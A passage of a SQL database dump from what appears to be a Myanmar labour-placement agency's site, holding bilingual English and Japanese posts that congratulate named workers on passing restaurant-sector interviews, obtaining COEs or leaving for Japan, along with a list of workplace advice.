('activities', 0, 77, 450, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p><strong>2024年6月25日 東京の大型レストランで働く3人の従業員に同行中。</strong></p><p><strong>AUNG ZIN OO、HNIN EI PHYU、EI SHWE ZIN、おめでとうございます！</strong></p><p><strong>- 健康に気を付けてください</strong></p><p><strong>- 勤務時間を厳守してください</strong></p><p><strong>- 仕事を自分の仕事のように扱い、一生懸命に取り組んでください</strong></p><p><strong>- 日本の文化を理解してください</strong></p><img src=\"/sites/default/files/inline-images/11_3.jpg\" data-entity-uuid=\"3a6b8a5f-2bdf-4db9-94e2-12d30445c28e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/22_4.jpg\" data-entity-uuid=\"53b33498-3201-4e1e-a61c-2be24dca4a65\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/33_4.jpg\" data-entity-uuid=\"883fcbe3-231b-464a-ac43-3853c7e963ac\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/44_3.jpg\" data-entity-uuid=\"91d3425d-8fa0-4d06-ac23-d00230c03826\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 78, 452, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS !&nbsp;</strong></h2></blockquote><p>Congratulations to NYEIN EI EI SWE &amp; EI EI MON for departure to HOKKAIDO , JAPAN on (13-6-2024).</p><img data-entity-uuid=\"6d0bfd26-10a4-4852-81da-e2f5b0d5799c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1.jpg\"><img data-entity-uuid=\"9076b915-d4f6-4503-b62e-f8cace497a1b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2.jpg\"><img data-entity-uuid=\"66807a01-f460-4c5f-8f12-0dbb3f10b535\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3.jpg\"><img data-entity-uuid=\"badc7488-f822-414d-819c-8ebcbc317ad2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4.jpg\"><img data-entity-uuid=\"27c4a836-59e5-48f3-97fc-ed4aca5b987f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/5.jpg\"><img data-entity-uuid=\"3310b4e6-ca01-4cee-bad5-270ec2925b0a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/6.jpg\">', '', 'full_html'),
('activities', 0, 78, 452, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p>NYEIN EI EI SWE と EI EI MON が 2024 年 6 月 13 日に日本の北海道へ出発します。</p><p>おめでとうございます。</p><img src=\"/sites/default/files/inline-images/1.jpg\" data-entity-uuid=\"6d0bfd26-10a4-4852-81da-e2f5b0d5799c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/2.jpg\" data-entity-uuid=\"9076b915-d4f6-4503-b62e-f8cace497a1b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/3.jpg\" data-entity-uuid=\"66807a01-f460-4c5f-8f12-0dbb3f10b535\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/4.jpg\" data-entity-uuid=\"badc7488-f822-414d-819c-8ebcbc317ad2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/5.jpg\" data-entity-uuid=\"27c4a836-59e5-48f3-97fc-ed4aca5b987f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/6.jpg\" data-entity-uuid=\"3310b4e6-ca01-4cee-bad5-270ec2925b0a\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 79, 453, 'en', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>Congratulations to SHIN THANT PHYU &amp; YAMIN THET for departure to FUKUOKA city, JAPAN.&nbsp;</p><img data-entity-uuid=\"00c724d7-71d7-42cc-9718-e7111848ea8c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1_0.jpg\"><img data-entity-uuid=\"a8efcca4-8f0f-4cc4-9dab-a0a02d7f7750\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2_0.jpg\"><img data-entity-uuid=\"0a670e45-4345-478f-a5a4-4824967e9d87\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3_0.jpg\"><img data-entity-uuid=\"8ef6d763-6c56-406c-838b-d3dc0dffed8a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4_0.jpg\">', '', 'full_html'),
('activities', 0, 80, 455, 'en', 0, '<blockquote><p><strong>CONGRATULATIONS !</strong></p></blockquote><p><strong>On February 5, 2024, two young daughters embarked on their journey to Fukuoka, Japan. Demonstrating dedication to their health and work, they consistently support their parents. We wish them continued success and fulfillment in their roles as exemplary daughters.</strong></p><p><strong>Congratulations to SHIN THANT PHYU &amp; YAMIN THET!&nbsp;</strong></p><img data-entity-uuid=\"dbb32235-5b0d-4f46-84c0-18919db88888\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1_1.jpg\"><img data-entity-uuid=\"7dc54b65-9b2a-4680-90ea-dea9bd3895ea\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2_1.jpg\"><img data-entity-uuid=\"2d8ede65-342c-4697-8dd1-5fd614759804\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3_1.jpg\"><img data-entity-uuid=\"2d24a1ac-660e-4859-8d83-c8c4671ac0e1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4_1.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 80, 455, 'ja', 0, '<blockquote><h2><strong>おめでとうございます!</strong></h2></blockquote><p><strong>2024年2月5日、2人の幼い娘が日本の福岡への旅に出ました。健康と仕事に献身的な姿勢を見せながら、彼女たちは両親を常にサポートしています。模範的な娘としての役割を今後も果たし、成功し続けることをお祈りします。</strong></p><p><strong>SHIN THANT PHYU &amp; YAMIN THET</strong>、<strong>おめでとうございます！</strong></p><img src=\"/sites/default/files/inline-images/1_1.jpg\" data-entity-uuid=\"dbb32235-5b0d-4f46-84c0-18919db88888\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/2_1.jpg\" data-entity-uuid=\"7dc54b65-9b2a-4680-90ea-dea9bd3895ea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/3_1.jpg\" data-entity-uuid=\"2d8ede65-342c-4697-8dd1-5fd614759804\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/4_1.jpg\" data-entity-uuid=\"2d24a1ac-660e-4859-8d83-c8c4671ac0e1\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 81, 457, 'en', 0, '<blockquote><p><strong>CONGRATULATIONS!</strong></p></blockquote><p><strong>Congratulations KAUNG MYAT SOE for passing the Interview for TOKUTEI GAISHOKU (Restaurant) with Excellent Points!!&nbsp;</strong></p><img data-entity-uuid=\"2b18eb1e-6642-4e54-8f81-e7fe33e63559\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/KAUNG%20MYAT%20SOE.jpg\">', '', 'full_html'),
('activities', 0, 81, 457, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p><strong>KAUNG MYAT SOE さん、特選外食 (レストラン) の面接に優秀な成績で合格しました。おめでとうございます!</strong></p><img src=\"/sites/default/files/inline-images/KAUNG%20MYAT%20SOE.jpg\" data-entity-uuid=\"2b18eb1e-6642-4e54-8f81-e7fe33e63559\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 82, 459, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations to MYO KHANT in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 82, 459, 'ja', 0, '<blockquote><h2>おめでとうございます！!</h2></blockquote><p>特定外食（レストラン）の面接に合格したMYO KHANT さん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 83, 464, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations For getting COE for KHU RICHARD &amp; LI SOUNG OO &nbsp;</p><p><img src=\"/sites/default/files/inline-images/khu%20richard.jpg\" data-entity-uuid=\"61a82c11-5fd4-4581-8495-3784f06a7942\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/li%20soung%20oo.jpg\" data-entity-uuid=\"dd8174ab-bdda-4e0e-b1e2-a70f7b7800b3\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 83, 464, 'ja', 0, '<p class=\"tw-data-text tw-text-large tw-ta\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(248, 249, 250);border:none;color:rgb(32, 33, 36);font-family:inherit;font-size:28px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;line-height:32px;margin:-2px 0px;orphans:2;overflow-wrap:break-word;overflow:hidden;padding:2px 0.14em 2px 0px;position:relative;resize:none;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;unicode-bidi:isolate;white-space:pre-wrap;widows:2;width:270px;word-spacing:0px;\" data-placeholder=\"Translation\" id=\"tw-target-text\" aria-label=\"Translated text\" data-ved=\"2ahUKEwj005-fyPaGAxVHSWwGHV9PA7kQ3ewLegQIBRAU\" dir=\"ltr\">&nbsp;</p><h2 class=\"tw-data-text tw-text-large tw-ta\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(248, 249, 250);border:none;color:rgb(32, 33, 36);font-family:inherit;font-size:28px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;line-height:32px;margin:-2px 0px;orphans:2;overflow-wrap:break-word;overflow:hidden;padding:2px 0.14em 2px 0px;position:relative;resize:none;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;unicode-bidi:isolate;white-space:pre-wrap;widows:2;width:270px;word-spacing:0px;\" data-placeholder=\"Translation\" id=\"tw-target-text\" aria-label=\"Translated text\" data-ved=\"2ahUKEwj005-fyPaGAxVHSWwGHV9PA7kQ3ewLegQIBRAU\" dir=\"ltr\"><span class=\"Y2IQFc\" lang=\"ja\">おめでとう！</span></h2><pre class=\"tw-data-text tw-text-large tw-ta\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(248, 249, 250);border:none;color:rgb(32, 33, 36);font-family:inherit;font-size:28px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;line-height:32px;margin:-2px 0px;orphans:2;overflow-wrap:break-word;overflow:hidden;padding:2px 0.14em 2px 0px;position:relative;resize:none;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;unicode-bidi:isolate;white-space:pre-wrap;widows:2;width:270px;word-spacing:0px;\" data-placeholder=\"Translation\" id=\"tw-target-text\" aria-label=\"Translated text\" data-ved=\"2ahUKEwj005-fyPaGAxVHSWwGHV9PA7kQ3ewLegQIBRAU\" dir=\"ltr\">&nbsp;</pre><pre class=\"tw-data-text tw-text-large tw-ta\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(248, 249, 250);border:none;color:rgb(32, 33, 36);font-family:inherit;font-size:28px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;line-height:32px;margin:-2px 0px;orphans:2;overflow-wrap:break-word;overflow:hidden;padding:2px 0.14em 2px 0px;position:relative;resize:none;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;unicode-bidi:isolate;white-space:pre-wrap;widows:2;width:270px;word-spacing:0px;\" data-placeholder=\"Translation\" id=\"tw-target-text\" aria-label=\"Translated text\" data-ved=\"2ahUKEwj005-fyPaGAxVHSWwGHV9PA7kQ3ewLegQIBRAU\" dir=\"ltr\"><span class=\"Y2IQFc\" lang=\"ja\">KHU RICHARDさんとLI SOUNG OOさんのCOE取得おめでとうございます\r\n</span></pre><p><br><img src=\"/sites/default/files/inline-images/khu%20richard.jpg\" data-entity-uuid=\"61a82c11-5fd4-4581-8495-3784f06a7942\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/li%20soung%20oo.jpg\" data-entity-uuid=\"dd8174ab-bdda-4e0e-b1e2-a70f7b7800b3\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 84, 465, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations to YE MONG AUNG in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 84, 465, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>特定外食（レストラン）の面接に合格したYE MONG AUNGさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 85, 463, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS!</strong></h2></blockquote><p><strong>Congratulations PAING MYO ZAW for passing the Interview &nbsp;Tokutei Gaishoku (Restaurant) !&nbsp;</strong></p><p>&nbsp;</p><img data-entity-uuid=\"2fb8cff3-5648-4379-8a1a-e205eb8c7dcb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/PAING%20MYO%20ZAW.jpg\">', '', 'full_html'),
('activities', 0, 85, 463, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p><strong>PAING MYO ZAWさん、特定外食面接合格おめでとうございます！</strong></p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/PAING%20MYO%20ZAW.jpg\" data-entity-uuid=\"2fb8cff3-5648-4379-8a1a-e205eb8c7dcb\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 86, 467, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations LA PYAE AUNG For Getting COE&nbsp;</p>', '', 'full_html'),
('activities', 0, 86, 467, 'ja', 0, '<blockquote><pre class=\"tw-data-text tw-text-large tw-ta\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(248, 249, 250);border:none;color:rgb(32, 33, 36);font-family:inherit;font-size:28px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;line-height:32px;margin:-2px 0px;orphans:2;overflow-wrap:break-word;overflow:hidden;padding:2px 0.14em 2px 0px;position:relative;resize:none;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;unicode-bidi:isolate;white-space:pre-wrap;widows:2;width:270px;word-spacing:0px;\" data-placeholder=\"Translation\" id=\"tw-target-text\" aria-label=\"Translated text\" data-ved=\"2ahUKEwjXt6L-yvaGAxX_TGwGHbTxDOsQ3ewLegQIBRAU\" dir=\"ltr\"><span class=\"Y2IQFc\" lang=\"ja\">おめでとう!</span></pre></blockquote><p class=\"tw-data-text tw-text-large tw-ta\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(248, 249, 250);border:none;color:rgb(32, 33, 36);font-family:inherit;font-size:28px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;line-height:32px;margin:-2px 0px;orphans:2;overflow-wrap:break-word;overflow:hidden;padding:2px 0.14em 2px 0px;position:relative;resize:none;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;unicode-bidi:isolate;white-space:pre-wrap;widows:2;width:270px;word-spacing:0px;\" data-placeholder=\"Translation\" id=\"tw-target-text\" aria-label=\"Translated text\" data-ved=\"2ahUKEwjXt6L-yvaGAxX_TGwGHbTxDOsQ3ewLegQIBRAU\" dir=\"ltr\">LA PYAE AUNG さん、COE 取得おめでとうございます</p>', '', 'full_html'),
('activities', 0, 87, 476, 'en', 0, '<blockquote><p>Things to Remember when you come to Japan to work</p></blockquote><ol><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Strictly respect working hours.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Maintain morals in work,</span><span class=\"HwtZe\" jsaction=\"mouseup:Sxi9L,BR6jm; mousedown:qjlr0e\" jsname=\"jqKxS\" lang=\"en\"> </span><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">No matter what kind of work you choose, try to work hard.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Learn to understand Japanese work/culture.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Respect seniors at work.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Listen carefully to the adults at work and work carefully and neatly.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">At the workplace, dress neatly and behave smartly.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Continuously learn and improve Japanese language/speaking Japanese.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Get into the habit of going to bed early/get enough sleep and get ready for work in the morning.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Reduce using Facebook at night completely.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Get rid of the (careless) ideas of \"that\'s enough\" and replace them with clear and precise ideas of \"I will do my best carefully and thoroughly\".</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Treat any business as if it were your own work and work hard.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">To work hard for Myanmar, learn the dignity of good manners, and make good sons and daughters who are proud of their parents. Let them show.</span></li></ol>', '', 'full_html'),
('activities', 0, 87, 476, 'ja', 0, '<blockquote><h3>日本に仕事で来るときに覚えておくべきこと</h3></blockquote><ol><li>労働時間を厳守してください。</li><li>仕事において道徳心を持ち、どんな仕事を選ぶにしても一生懸命働くように努めてください。</li><li>日本の仕事や文化を理解する。</li><li>職場では先輩を尊敬しましょう。</li><li>職場の大人の言うことをよく聞いて、丁寧にきれいに仕事をしましょう。</li><li>職場ではきちんとした服装をし、スマートな振る舞いをしましょう。</li><li>継続的に日本語を学び、日本語の会話力を向上させます。</li><li>早めに寝る習慣をつけ、十分な睡眠をとり、朝の仕事に備えましょう。</li><li>夜間の Facebook の使用を完全に減らしましょう。</li><li>「もう十分だ」という（不注意な）考えを捨て、「慎重に徹底的に最善を尽くす」という明確で正確な考えに置き換えてください。</li><li>いかなるビジネスも自分の仕事であるかのように扱い、一生懸命働きましょう。</li><li>ミャンマーのために一生懸命働き、礼儀正しさの尊厳を学び、親を誇りに思うような良い息子、娘を育てましょう。それを示しましょう。</li></ol>', '', 'full_html'),
('activities', 0, 88, 471, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations NILAR AUNG &amp; TIN ZAR WIN MYINT For Getting COE<img src=\"/sites/default/files/inline-images/Nila%20Aung.jpg\" data-entity-uuid=\"372f4e87-6e97-42d0-b5d3-fe9fd367eaed\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Tin%20Zar%20Win%20Myinnt.jpg\" data-entity-uuid=\"7c3d4292-72a4-4fc9-b99b-9c3e67f4fd05\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 88, 471, 'ja', 0, '<blockquote><p>おめでとう！</p></blockquote><p>NILAR AUNG さんと TIN ZAR さん、COE 取得おめでとうございます<img src=\"/sites/default/files/inline-images/Nila%20Aung.jpg\" data-entity-uuid=\"372f4e87-6e97-42d0-b5d3-fe9fd367eaed\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Tin%20Zar%20Win%20Myinnt.jpg\" data-entity-uuid=\"7c3d4292-72a4-4fc9-b99b-9c3e67f4fd05\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 89, 473, 'en', 0, '<blockquote><h2><img src=\"/sites/default/files/inline-images/Pyae%20Son%20Aung.jpg\" data-entity-uuid=\"6db3ad63-a91f-47e1-8518-40600fc3fdf6\" data-entity-type=\"file\">Congratulations!</h2></blockquote><p>Congratulations THANDAR MOE &amp; PYAE SONE AUNG For Getting COE</p>', '', 'full_html'),
('activities', 0, 89, 473, 'ja', 0, '<blockquote><h2><img src=\"/sites/default/files/inline-images/Pyae%20Son%20Aung.jpg\" data-entity-uuid=\"6db3ad63-a91f-47e1-8518-40600fc3fdf6\" data-entity-type=\"file\"> おめでとう！</h2><p>THANDAR MOE さんと PYAE SONE AUNG さん、COE 取得おめでとうございます</p></blockquote>', '', 'full_html'),
('activities', 0, 90, 478, 'en', 0, '<blockquote><h2>Congratulations!!</h2></blockquote><p>Congratulations to CHAW KYIT KYAW in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 90, 478, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>特定外食（レストラン）の面接に合格したCHAW KYIT KYAWさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 91, 480, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations HNIN EI PHYU &amp; EI SHWE ZIN &amp; AUNG ZIN OO For Getting COE<img src=\"/sites/default/files/inline-images/AUNG%20ZIN%20KO.jpg\" data-entity-uuid=\"1f473f5c-0d06-4380-98e1-af1f06d81b3e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Ei%20Shwe%20Zin.jpg\" data-entity-uuid=\"35704e3e-a6dc-466f-afc3-e9f68aff58cf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Hnin%20Pwint%20Phyu.jpg\" data-entity-uuid=\"34af725f-866d-4124-ad46-625b9369b571\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 91, 480, 'ja', 0, '<blockquote><h2>おめでとう！</h2></blockquote><p>HNIN EI PHYU さん、EI SHWE ZIN さん、AUNG ZIN OO さん、COE 取得おめでとうございます<img src=\"/sites/default/files/inline-images/AUNG%20ZIN%20KO.jpg\" data-entity-uuid=\"1f473f5c-0d06-4380-98e1-af1f06d81b3e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Ei%20Shwe%20Zin.jpg\" data-entity-uuid=\"35704e3e-a6dc-466f-afc3-e9f68aff58cf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Hnin%20Pwint%20Phyu.jpg\" data-entity-uuid=\"34af725f-866d-4124-ad46-625b9369b571\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 92, 482, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations YA MIN THET &amp; SHIN THANT PHYU For Getting COE<img data-entity-uuid=\"86fe3516-a24b-4295-91dc-932863cdc3cf\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/shin%20thant%20phyu.jpg\"><img data-entity-uuid=\"ba08b50a-d080-4016-96a2-ec28527df846\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/ya%20min%20thant.jpg\"></p>', '', 'full_html'),
('activities', 0, 92, 482, 'ja', 0, '<blockquote><h2>おめでとう！</h2></blockquote><p>YA MIN THET さんと SHIN THANT PHYU さん、COE 取得おめでとうございます<img src=\"/sites/default/files/inline-images/shin%20thant%20phyu.jpg\" data-entity-uuid=\"86fe3516-a24b-4295-91dc-932863cdc3cf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/ya%20min%20thant.jpg\" data-entity-uuid=\"ba08b50a-d080-4016-96a2-ec28527df846\" data-entity-type=\"file\"></p>', '', 'full_html');
INSERT INTO `node__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 93, 484, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations KHAING HNIN WAI &amp; EI EI PHYO &amp; EI EI MIN &amp; NAN THAE NU SOE For Getting COE<img data-entity-uuid=\"16a5094a-28f4-411c-83fa-e15ba391288b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/ei%20ei%20min.jpg\"><img><img data-entity-uuid=\"0498a148-f35d-464f-8e0b-fffdd9d41791\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khaing%20hnin%20wai.jpg\"><img data-entity-uuid=\"f7fb4683-4a6e-48cf-9181-6d3817e0ef67\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Nan%20thae%20nu%20soe.jpg\"></p>', '', 'full_html'),
('activities', 0, 93, 484, 'ja', 0, '<blockquote><h2>おめでとう！</h2></blockquote><p>KHAING HNIN WAI &amp; EI EI PHYO &amp; EI EI MIN &amp; NAN THAE NU SOE COE取得おめでとうございます<img src=\"/sites/default/files/inline-images/ei%20ei%20min.jpg\" data-entity-uuid=\"16a5094a-28f4-411c-83fa-e15ba391288b\" data-entity-type=\"file\"><img><img src=\"/sites/default/files/inline-images/khaing%20hnin%20wai.jpg\" data-entity-uuid=\"0498a148-f35d-464f-8e0b-fffdd9d41791\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Nan%20thae%20nu%20soe.jpg\" data-entity-uuid=\"f7fb4683-4a6e-48cf-9181-6d3817e0ef67\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 94, 485, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations NYEIN EI EI SHWE &amp; EI EI MON &nbsp;For Getting COE<img data-entity-uuid=\"9eded7af-c141-4a8d-aeb9-991c8bdf33ae\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/ei%20ei%20mon.jpg\"><img data-entity-uuid=\"43907b43-a93b-4b40-9c16-d06b9d91c40f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/nyein%20ei%20ei%20shwe.jpg\"></p>', '', 'full_html'),
('activities', 0, 95, 524, 'en', 0, '<blockquote><p>Images for 3th Batch Students participating in on-job training at YANGON\'s Famous Restaurants for more experiences to gain.&nbsp;</p></blockquote><img src=\"/sites/default/files/inline-images/1_2.jpg\" data-entity-uuid=\"f55c58d0-0dc4-4ab7-a8ef-a06f23025b82\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/2_2.jpg\" data-entity-uuid=\"e43640aa-0416-483b-9f74-4b931881a554\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/3_2.jpg\" data-entity-uuid=\"a95c0918-82a4-4a55-81f9-1081a3572ed6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/4_2.jpg\" data-entity-uuid=\"833b6a48-32d2-49c4-9289-a8f56282609e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/5_0.jpg\" data-entity-uuid=\"d8dea806-be35-47f5-afe1-e09cf2ca0e33\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/6_0.jpg\" data-entity-uuid=\"9b72d526-fc43-4216-906a-a4e3f8d5c10a\" 